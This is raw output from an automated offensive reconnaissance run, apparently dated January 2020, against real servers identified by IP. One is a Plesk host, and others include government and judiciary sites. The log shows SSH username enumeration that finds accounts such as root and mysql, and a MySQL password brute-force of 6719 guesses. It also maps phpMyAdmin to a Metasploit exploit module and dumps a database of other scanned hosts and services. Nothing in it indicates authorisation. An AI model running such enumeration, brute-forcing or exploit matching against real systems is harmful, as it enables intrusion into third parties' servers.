22004 127.79 ms toro-b1-link.telia.net (62.115.168.48)
22015 127.85 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
22026 47.47 ms nyk-bb2-link.telia.net (62.115.113.86)
22037 155.87 ms ldn-bb3-link.telia.net (62.115.113.21)
22048 155.90 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
22059 155.95 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
220610 155.93 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
220711 155.95 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
220812 185.62 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
220913 185.66 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
221014 185.68 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
221115 ...
221216 126.39 ms s18161039.onlinehome-server.info (217.160.131.142)
2213####################################################################################################################################
2214USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2215RHOSTS => 217.160.131.142
2216RHOST => 217.160.131.142
2217[*] 217.160.131.142:22 - SSH - Using malformed packet technique
2218[*] 217.160.131.142:22 - SSH - Starting scan
2219[-] 217.160.131.142:22 - SSH - User 'admin' not found
2220[-] 217.160.131.142:22 - SSH - User 'administrator' not found
2221[-] 217.160.131.142:22 - SSH - User 'anonymous' not found
2222[-] 217.160.131.142:22 - SSH - User 'backup' not found
2223[-] 217.160.131.142:22 - SSH - User 'bee' not found
2224[+] 217.160.131.142:22 - SSH - User 'ftp' found
2225[-] 217.160.131.142:22 - SSH - User 'guest' not found
2226[-] 217.160.131.142:22 - SSH - User 'GUEST' not found
2227[-] 217.160.131.142:22 - SSH - User 'info' not found
2228[+] 217.160.131.142:22 - SSH - User 'mail' found
2229[-] 217.160.131.142:22 - SSH - User 'mailadmin' not found
2230[-] 217.160.131.142:22 - SSH - User 'msfadmin' not found
2231[+] 217.160.131.142:22 - SSH - User 'mysql' found
2232[+] 217.160.131.142:22 - SSH - User 'nobody' found
2233[-] 217.160.131.142:22 - SSH - User 'oracle' not found
2234[-] 217.160.131.142:22 - SSH - User 'owaspbwa' not found
2235[-] 217.160.131.142:22 - SSH - User 'postfix' not found
2236[-] 217.160.131.142:22 - SSH - User 'postgres' not found
2237[-] 217.160.131.142:22 - SSH - User 'private' not found
2238[-] 217.160.131.142:22 - SSH - User 'proftpd' not found
2239[-] 217.160.131.142:22 - SSH - User 'public' not found
2240[+] 217.160.131.142:22 - SSH - User 'root' found
2241[-] 217.160.131.142:22 - SSH - User 'superadmin' not found
2242[-] 217.160.131.142:22 - SSH - User 'support' not found
2243[-] 217.160.131.142:22 - SSH - User 'sys' not found
2244[-] 217.160.131.142:22 - SSH - User 'system' not found
2245[-] 217.160.131.142:22 - SSH - User 'systemadmin' not found
2246[-] 217.160.131.142:22 - SSH - User 'systemadministrator' not found
2247[-] 217.160.131.142:22 - SSH - User 'test' not found
2248[-] 217.160.131.142:22 - SSH - User 'tomcat' not found
2249[-] 217.160.131.142:22 - SSH - User 'user' not found
2250[-] 217.160.131.142:22 - SSH - User 'webmaster' not found
2251[-] 217.160.131.142:22 - SSH - User 'www-data' not found
2252[-] 217.160.131.142:22 - SSH - User 'Fortimanager_Access' not found
2253[*] Scanned 1 of 1 hosts (100% complete)
2254[*] Auxiliary module execution completed
2255####################################################################################################################################
2256Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:29 EST
2257Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2258Host is up (0.15s latency).
2259
2260PORT STATE SERVICE VERSION
226167/tcp closed dhcps
226267/udp closed dhcps
2263Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2264Device type: power-device|router
2265Running: Fronius embedded, MikroTik RouterOS 6.X
2266OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
2267OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
2268Network Distance: 13 hops
2269
2270TRACEROUTE (using port 67/tcp)
2271HOP RTT ADDRESS
22721 104.21 ms 10.246.204.1
22732 104.25 ms 104.245.145.177
22743 104.31 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
22754 104.29 ms toro-b1-link.telia.net (62.115.168.48)
22765 104.33 ms toro-b3-link.telia.net (62.115.116.180)
22776 62.48 ms nyk-bb2-link.telia.net (62.115.113.86)
22787 154.57 ms ldn-bb3-link.telia.net (62.115.113.21)
22798 154.59 ms prs-bb3-link.telia.net (62.115.134.92)
22809 193.79 ms ffm-bb3-link.telia.net (62.115.123.12)
228110 193.82 ms ffm-b1-link.telia.net (62.115.141.237)
228211 154.62 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
228312 ...
228413 154.64 ms s18161039.onlinehome-server.info (217.160.131.142)
2285###################################################################################################################################
2286http://217.160.131.142 [200 OK] Apache, Country[GERMANY][DE], HTML5, HTTPServer[Apache], IP[217.160.131.142], Plesk[Lin], Title[Default Parallels Plesk Page], X-Powered-By[PleskLin], X-UA-Compatible[IE=edge]
2287###################################################################################################################################
2288
2289wig - WebApp Information Gatherer
2290
2291
2292Scanning http://217.160.131.142...
2293___________________________________________ SITE INFO ___________________________________________
2294IP Title
2295217.160.131.142 Default Parallels Plesk Page
2296
2297____________________________________________ VERSION ____________________________________________
2298Name Versions Type
2299Apache 2.2.11 | 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 Platform
2300 2.2.18 | 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24
2301 2.2.25 | 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.3.0 | 2.3.1
2302 2.3.10 | 2.3.11 | 2.3.12 | 2.3.13 | 2.3.14 | 2.3.15 | 2.3.16
2303 2.3.2 | 2.3.3 | 2.3.4 | 2.3.5 | 2.3.6 | 2.3.7 | 2.3.8
2304 2.3.9 | 2.4.0 | 2.4.1 | 2.4.2 | 2.4.3
2305
2306_________________________________________________________________________________________________
2307Time: 38.6 sec Urls: 816 Fingerprints: 40401
2308##################################################################################################################################
2309HTTP/1.1 200 OK
2310Date: Sun, 05 Jan 2020 08:30:03 GMT
2311Server: Apache
2312Last-Modified: Tue, 30 Jan 2018 10:06:23 GMT
2313ETag: "b00227-1b79-563fb83d0e5c0"
2314Accept-Ranges: bytes
2315Content-Length: 7033
2316X-Powered-By: PleskLin
2317Connection: close
2318Content-Type: text/html
2319
2320HTTP/1.1 200 OK
2321Date: Sun, 05 Jan 2020 08:30:04 GMT
2322Server: Apache
2323Last-Modified: Tue, 30 Jan 2018 10:06:23 GMT
2324ETag: "b00227-1b79-563fb83d0e5c0"
2325Accept-Ranges: bytes
2326Content-Length: 7033
2327X-Powered-By: PleskLin
2328Connection: close
2329Content-Type: text/html
2330####################################################################################################################################
2331Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:30 EST
2332Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2333Host is up (0.14s latency).
2334
2335PORT STATE SERVICE VERSION
2336123/tcp closed ntp
2337123/udp closed ntp
2338Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2339Device type: power-device|router
2340Running: Fronius embedded, MikroTik RouterOS 6.X
2341OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
2342OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
2343Network Distance: 13 hops
2344
2345TRACEROUTE (using port 123/tcp)
2346HOP RTT ADDRESS
23471 59.98 ms 10.246.204.1
23482 91.06 ms 104.245.145.177
23493 91.10 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
23504 91.07 ms toro-b1-link.telia.net (62.115.168.48)
23515 91.16 ms toro-b3-link.telia.net (62.115.116.180)
23526 56.62 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
23537 188.03 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
23548 157.79 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
23559 158.04 ms ffm-bb3-link.telia.net (62.115.123.12)
235610 157.92 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
235711 157.90 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
235812 ...
235913 158.02 ms s18161039.onlinehome-server.info (217.160.131.142)
2360###################################################################################################################################
2361https://217.160.131.142/ [200 OK] Apache, Country[GERMANY][DE], HTML5, HTTPServer[Apache], IP[217.160.131.142], Plesk[Lin], Title[Default Parallels Plesk Page], X-Powered-By[PleskLin], X-UA-Compatible[IE=edge]
2362####################################################################################################################################
2363Version: 1.11.13-static
2364OpenSSL 1.0.2-chacha (1.0.2g-dev)
2365
2366Connected to 217.160.131.142
2367
2368Testing SSL server 217.160.131.142 on port 443 using SNI name 217.160.131.142
2369
2370 TLS Fallback SCSV:
2371Server supports TLS Fallback SCSV
2372
2373 TLS renegotiation:
2374Secure session renegotiation supported
2375
2376 TLS Compression:
2377Compression disabled
2378
2379 Heartbleed:
2380TLS 1.2 not vulnerable to heartbleed
2381TLS 1.1 not vulnerable to heartbleed
2382TLS 1.0 not vulnerable to heartbleed
2383
2384 Supported Server Cipher(s):
2385Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2386Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2387Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2388Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
2389Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
2390Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2391Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2392Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2393Accepted TLSv1.2 256 bits AES256-SHA256
2394Accepted TLSv1.2 256 bits AES256-SHA
2395Accepted TLSv1.2 256 bits CAMELLIA256-SHA
2396Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2397Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2398Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2399Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
2400Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
2401Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2402Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2403Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2404Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2405Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2406Accepted TLSv1.2 128 bits AES128-SHA256
2407Accepted TLSv1.2 128 bits AES128-SHA
2408Accepted TLSv1.2 128 bits CAMELLIA128-SHA
2409Accepted TLSv1.2 112 bits DES-CBC3-SHA
2410Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2411Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2412Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2413Accepted TLSv1.1 256 bits AES256-SHA
2414Accepted TLSv1.1 256 bits CAMELLIA256-SHA
2415Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2416Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2417Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2418Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2419Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2420Accepted TLSv1.1 128 bits AES128-SHA
2421Accepted TLSv1.1 128 bits CAMELLIA128-SHA
2422Accepted TLSv1.1 112 bits DES-CBC3-SHA
2423Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2424Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2425Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2426Accepted TLSv1.0 256 bits AES256-SHA
2427Accepted TLSv1.0 256 bits CAMELLIA256-SHA
2428Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2429Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2430Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2431Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2432Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
2433Accepted TLSv1.0 128 bits AES128-SHA
2434Accepted TLSv1.0 128 bits CAMELLIA128-SHA
2435Accepted TLSv1.0 112 bits DES-CBC3-SHA
2436
2437 SSL Certificate:
2438Signature Algorithm: sha1WithRSAEncryption
2439RSA Key Strength: 2048
2440
2441Subject: Parallels Panel
2442Issuer: Parallels Panel
2443
2444Not valid before: Jan 27 11:06:14 2015 GMT
2445Not valid after: Jan 27 11:06:14 2016 GMT
2446###################################################################################################################################
2447Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:31 EST
2448NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
2449NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
2450NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
2451Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2452Host is up (0.16s latency).
2453
2454PORT STATE SERVICE VERSION
24553306/tcp open mysql MySQL 5.1.73
2456| mysql-brute:
2457| Accounts: No valid accounts found
2458|_ Statistics: Performed 6719 guesses in 180 seconds, average tps: 37.0
2459| mysql-enum:
2460| Accounts: No valid accounts found
2461|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
2462| mysql-info:
2463| Protocol: 10
2464| Version: 5.1.73
2465| Thread ID: 565102
2466| Capabilities flags: 63487
2467| Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolNew, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, LongColumnFlag
2468| Status: Autocommit
2469|_ Salt: dlrv|+_~zi$o'o~K=-gD
2470Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2471Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 - 2.6.39 (94%)
2472No exact OS matches for host (test conditions non-ideal).
2473Network Distance: 13 hops
2474
2475TRACEROUTE (using port 3306/tcp)
2476HOP RTT ADDRESS
24771 83.49 ms 10.246.204.1
24782 83.82 ms 104.245.145.177
24793 84.57 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
24804 54.66 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
24815 64.56 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141)
24826 94.75 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
24837 155.53 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
24848 155.55 ms prs-bb3-link.telia.net (62.115.134.92)
24859 185.96 ms ffm-bb3-link.telia.net (62.115.123.12)
248610 186.00 ms ffm-b1-link.telia.net (62.115.121.5)
248711 185.90 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
248812 186.00 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
248913 185.93 ms s18161039.onlinehome-server.info (217.160.131.142)
2490#################################################################################################################################
2491-+--------------------------------------------------+----------+----------+
2492| App Name | URL to Application | Potential Exploit | Username | Password |
2493+------------+------------------------------------------+--------------------------------------------------+----------+----------+
2494| phpMyAdmin | https://217.160.131.142:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
2495+------------+------------------------------------------+--------------------------------------------------+----------+----------+
2496###################################################################################################################################
2497Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:44 EST
2498Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
2499Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2500Host is up (0.15s latency).
2501Not shown: 65527 closed ports
2502PORT STATE SERVICE VERSION
250321/tcp open ftp ProFTPD
2504| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2505| Not valid before: 2015-01-27T11:06:14
2506|_Not valid after: 2016-01-27T11:06:14
2507|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
2508| tls-nextprotoneg:
2509|_ ftp
251022/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2511| ssh-hostkey:
2512| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
2513|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
251480/tcp open http Apache httpd (PleskLin)
2515|_http-favicon: Parallels Control Panel
2516|_http-server-header: Apache
2517|_http-title: Domain Default page
2518443/tcp open ssl/http Apache httpd (PleskLin)
2519|_http-favicon: Parallels Control Panel
2520|_http-server-header: Apache
2521|_http-title: Domain Default page
2522| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2523| Not valid before: 2015-01-27T11:06:14
2524|_Not valid after: 2016-01-27T11:06:14
2525|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
25263306/tcp open mysql MySQL 5.1.73
2527| mysql-info:
2528| Protocol: 10
2529| Version: 5.1.73
2530| Thread ID: 574774
2531| Capabilities flags: 63487
2532| Some Capabilities: Support41Auth, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, Speaks41ProtocolOld, LongPassword, SupportsTransactions, IgnoreSpaceBeforeParenthesis, FoundRows, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, ODBCClient, SupportsCompression, InteractiveClient
2533| Status: Autocommit
2534|_ Salt: =k'yO^m)"ky=bWm>/kR9
25354643/tcp open ssl/http Apache httpd
2536|_http-server-header: Apache
2537| http-title: Parallels Power Panel - s18161039.onlinehome-server.info
2538|_Requested resource was https://s18161039.onlinehome-server.info:4643/vz/cp
2539| ssl-cert: Subject: commonName=vhn.schlund.de/organizationName=Parallels, Inc./stateOrProvinceName=VA/countryName=US
2540| Not valid before: 2016-02-28T21:02:46
2541|_Not valid after: 2017-02-27T21:02:46
2542|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
25438443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
2544|_http-favicon: Parallels Plesk
2545| http-robots.txt: 1 disallowed entry
2546|_/
2547|_http-server-header: sw-cp-server
2548|_http-title: Plesk Onyx 17.8.11
2549| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2550| Not valid before: 2015-01-27T11:06:14
2551|_Not valid after: 2016-01-27T11:06:14
2552|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
2553| tls-nextprotoneg:
2554|_ http/1.1
25558880/tcp open http sw-cp-server httpd (Plesk Onyx 17.8.11)
2556|_http-favicon: Parallels Plesk
2557| http-robots.txt: 1 disallowed entry
2558|_/
2559|_http-server-header: sw-cp-server
2560|_http-title: Plesk Onyx 17.8.11
2561Device type: general purpose|router|storage-misc|WAP|broadband router|media device
2562Running (JUST GUESSING): Linux 2.6.X|3.X (93%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Infomir embedded (88%), Netgear RAIDiator 4.X (88%)
2563OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:6.32.1 cpe:/h:hp:p2000_g3 cpe:/h:ubnt:airmax_nanostation cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/o:netgear:raidiator:4.2.21
2564Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 - 3.1 (92%), Linux 2.6.32 - 3.13 (92%), MikroTik RouterOS 6.32.1 (91%), Linux 3.10 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 2.6.39 (90%), Linux 3.2 (90%), HP P2000 G3 NAS device (89%), Linux 3.5 (89%)
2565No exact OS matches for host (test conditions non-ideal).
2566Network Distance: 13 hops
2567Service Info: Host: hn1556.rtr.schlund.de
2568
2569Host script results:
2570|_clock-skew: mean: -3s, deviation: 0s, median: -3s
2571
2572TRACEROUTE (using port 554/tcp)
2573HOP RTT ADDRESS
25741 127.28 ms 10.246.204.1
25752 127.32 ms 104.245.145.177
25763 127.36 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
25774 127.35 ms toro-b1-link.telia.net (62.115.168.48)
25785 97.11 ms toro-b3-link.telia.net (62.115.116.180)
25796 55.66 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
25807 155.48 ms ldn-bb3-link.telia.net (62.115.113.21)
25818 155.51 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
25829 187.10 ms ffm-bb3-link.telia.net (62.115.123.12)
258310 187.18 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
258411 155.57 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
258512 ...
258613 155.55 ms s18161039.onlinehome-server.info (217.160.131.142)
2587####################################################################################################################################
2588Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:53 EST
2589Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
2590Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2591Host is up (0.16s latency).
2592
2593PORT STATE SERVICE VERSION
259453/tcp closed domain
259567/tcp closed dhcps
259668/tcp closed dhcpc
259769/tcp closed tftp
259888/tcp closed kerberos-sec
2599123/tcp closed ntp
2600137/tcp closed netbios-ns
2601138/tcp closed netbios-dgm
2602139/tcp closed netbios-ssn
2603161/tcp closed snmp
2604162/tcp closed snmptrap
2605389/tcp closed ldap
2606520/tcp closed efs
26072049/tcp closed nfs
260853/udp open|filtered domain
260967/udp closed dhcps
261068/udp closed dhcpc
261169/udp open|filtered tftp
261288/udp open|filtered kerberos-sec
2613123/udp closed ntp
2614137/udp filtered netbios-ns
2615138/udp filtered netbios-dgm
2616139/udp closed netbios-ssn
2617161/udp open|filtered snmp
2618162/udp closed snmptrap
2619389/udp closed ldap
2620520/udp closed route
26212049/udp closed nfs
2622Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2623Device type: power-device|router
2624Running: Fronius embedded, MikroTik RouterOS 6.X
2625OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
2626OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
2627Network Distance: 16 hops
2628
2629TRACEROUTE (using port 162/tcp)
2630HOP RTT ADDRESS
26311 85.57 ms 10.246.204.1
26322 161.89 ms 104.245.145.177
26333 161.93 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
26344 161.96 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
26355 53.66 ms toro-b3-link.telia.net (62.115.116.180)
26366 63.17 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
26377 163.36 ms ldn-bb3-link.telia.net (62.115.113.21)
26388 163.40 ms prs-bb3-link.telia.net (62.115.134.92)
26399 163.44 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
264010 163.47 ms ffm-b1-link.telia.net (62.115.141.237)
264111 163.45 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
264212 163.48 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
264313 163.54 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
264414 163.54 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
264515 ...
264616 128.78 ms s18161039.onlinehome-server.info (217.160.131.142)
2647####################################################################################################################################
2648Hosts
2649=====
2650
2651address mac name os_name os_flavor os_sp purpose info comments
2652------- --- ---- ------- --------- ----- ------- ---- --------
265380.82.79.116 no-reverse-dns-configured.com Linux 7.0 server
265487.247.240.207 crayford.servers.prgn.misp.co.uk Android 5.X device
265593.174.93.84 Linux 3.X server
2656163.247.52.17 www.mtt.cl Linux 2.6.X server
2657163.247.96.10 Linux 2.6.X server
2658170.246.172.178 host-170-246-172-178.anacondaweb.com Linux 2.6.X server
2659185.68.93.22 verbatim1981.example.com Unknown device
2660186.67.91.110 ipj10-110.poderjudicial.cl Linux 2.6.X server
2661194.18.73.2 www.sakerhetspolisen.se Linux 2.6.X server
2662194.39.164.140 194.39.164.140.srvlist.ukfast.net Linux 3.X server
2663200.35.157.77 srv77.talcaguia.cl Unknown device
2664201.131.38.40 Linux 2.6.X server
2665217.160.131.142 s18161039.onlinehome-server.info Linux 2.6.X server
2666
2667Services
2668========
2669
2670host port proto name state info
2671---- ---- ----- ---- ----- ----
267280.82.79.116 21 tcp ftp open 220 (vsFTPd 3.0.2)\x0d\x0a
267380.82.79.116 22 tcp ssh open SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
267480.82.79.116 53 tcp domain open ISC BIND 9.8.4-rpz2+rl005.12-P1
267580.82.79.116 53 udp domain open ISC BIND 9.8.4-rpz2+rl005.12-P1
267680.82.79.116 67 tcp dhcps closed
267780.82.79.116 67 udp dhcps closed
267880.82.79.116 68 tcp dhcpc closed
267980.82.79.116 68 udp dhcpc closed
268080.82.79.116 69 tcp tftp closed
268180.82.79.116 69 udp tftp unknown
268280.82.79.116 88 tcp kerberos-sec closed
268380.82.79.116 88 udp kerberos-sec unknown
268480.82.79.116 123 tcp ntp closed
268580.82.79.116 123 udp ntp unknown
268680.82.79.116 137 tcp netbios-ns closed
268780.82.79.116 137 udp netbios-ns filtered
268880.82.79.116 138 tcp netbios-dgm closed
268980.82.79.116 138 udp netbios-dgm filtered
269080.82.79.116 139 tcp netbios-ssn closed
269180.82.79.116 139 udp netbios-ssn unknown
269280.82.79.116 161 tcp snmp closed
269380.82.79.116 161 udp snmp closed
269480.82.79.116 162 tcp snmptrap closed
269580.82.79.116 162 udp snmptrap closed
269680.82.79.116 389 tcp ldap closed
269780.82.79.116 389 udp ldap closed
269880.82.79.116 520 tcp efs closed
269980.82.79.116 520 udp route closed
270080.82.79.116 2049 tcp nfs closed
270180.82.79.116 2049 udp nfs unknown
270287.247.240.207 21 tcp ftp open ProFTPD
270387.247.240.207 22 tcp ssh open OpenSSH 7.4 protocol 2.0
270487.247.240.207 67 udp dhcps unknown
270587.247.240.207 68 udp dhcpc unknown
270687.247.240.207 69 udp tftp unknown
270787.247.240.207 80 tcp http open Apache httpd
270887.247.240.207 88 udp kerberos-sec unknown
270987.247.240.207 110 tcp pop3 open Dovecot pop3d
271087.247.240.207 123 udp ntp unknown
271187.247.240.207 139 udp netbios-ssn unknown
271287.247.240.207 143 tcp imap open Dovecot imapd
271387.247.240.207 161 udp snmp unknown
271487.247.240.207 162 udp snmptrap unknown
271587.247.240.207 389 udp ldap unknown
271687.247.240.207 443 tcp ssl/http open Apache httpd
271787.247.240.207 465 tcp ssl/smtp open Exim smtpd 4.92
271887.247.240.207 520 udp route unknown
271987.247.240.207 587 tcp smtp open Exim smtpd 4.92
272087.247.240.207 993 tcp ssl/imaps open
272187.247.240.207 995 tcp ssl/pop3s open
272287.247.240.207 2049 udp nfs unknown
272393.174.93.84 21 tcp ftp open vsftpd 3.0.2
272493.174.93.84 25 tcp smtp closed
272593.174.93.84 53 tcp domain filtered
272693.174.93.84 53 udp domain filtered
272793.174.93.84 67 tcp dhcps filtered
272893.174.93.84 67 udp dhcps filtered
272993.174.93.84 68 tcp dhcpc filtered
273093.174.93.84 68 udp dhcpc unknown
273193.174.93.84 69 tcp tftp filtered
273293.174.93.84 69 udp tftp unknown
273393.174.93.84 80 tcp http open Apache httpd 2.4.6 (CentOS) PHP/5.4.16
273493.174.93.84 88 tcp kerberos-sec filtered
273593.174.93.84 88 udp kerberos-sec unknown
273693.174.93.84 123 tcp ntp filtered
273793.174.93.84 123 udp ntp filtered
273893.174.93.84 137 tcp netbios-ns filtered
273993.174.93.84 137 udp netbios-ns filtered
274093.174.93.84 138 tcp netbios-dgm filtered
274193.174.93.84 138 udp netbios-dgm filtered
274293.174.93.84 139 tcp netbios-ssn closed
